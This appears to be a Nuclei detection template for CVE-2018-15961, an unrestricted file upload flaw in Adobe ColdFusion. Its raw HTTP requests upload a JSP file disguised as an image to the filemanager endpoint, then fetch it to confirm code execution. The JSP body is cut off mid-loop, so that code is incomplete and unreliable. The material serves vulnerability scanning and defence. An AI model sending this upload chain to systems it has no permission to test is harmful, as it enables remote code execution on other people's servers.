id: CVE-2018-15961 info: name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution author: SkyLark-Lab,ImNightmaree severity: critical description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. remediation: | Apply the necessary security patches or updates provided by Adobe to fix this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 - http://www.securitytracker.com/id/1041621 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-15961 cwe-id: CWE-434 epss-score: 0.97447 epss-percentile: 0.99935 cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive http: - raw: - | POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------24464570528145 -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg <%@ page import="java.util.*,java.io.*"%> <%@ page import="java.security.MessageDigest"%> <% String cve = "CVE-2018-15961"; MessageDigest alg = MessageDigest.getInstance("MD5"); alg.reset(); alg.update(cve.getBytes()); byte[] digest = alg.digest(); StringBuffer hashedpasswd = new StringBuffer(); String hx; for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - | GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: - 200 # digest: 4b0a00483046022100a54fb7a8857252a351862c34a712c75283e2ea9c1faf99e17737c9a827f89655022100fcab8e40388d194f0b2902c8b347732c910c9be888069551061e2885ea7319f9:922c64590222798bb761d5b6d8e72950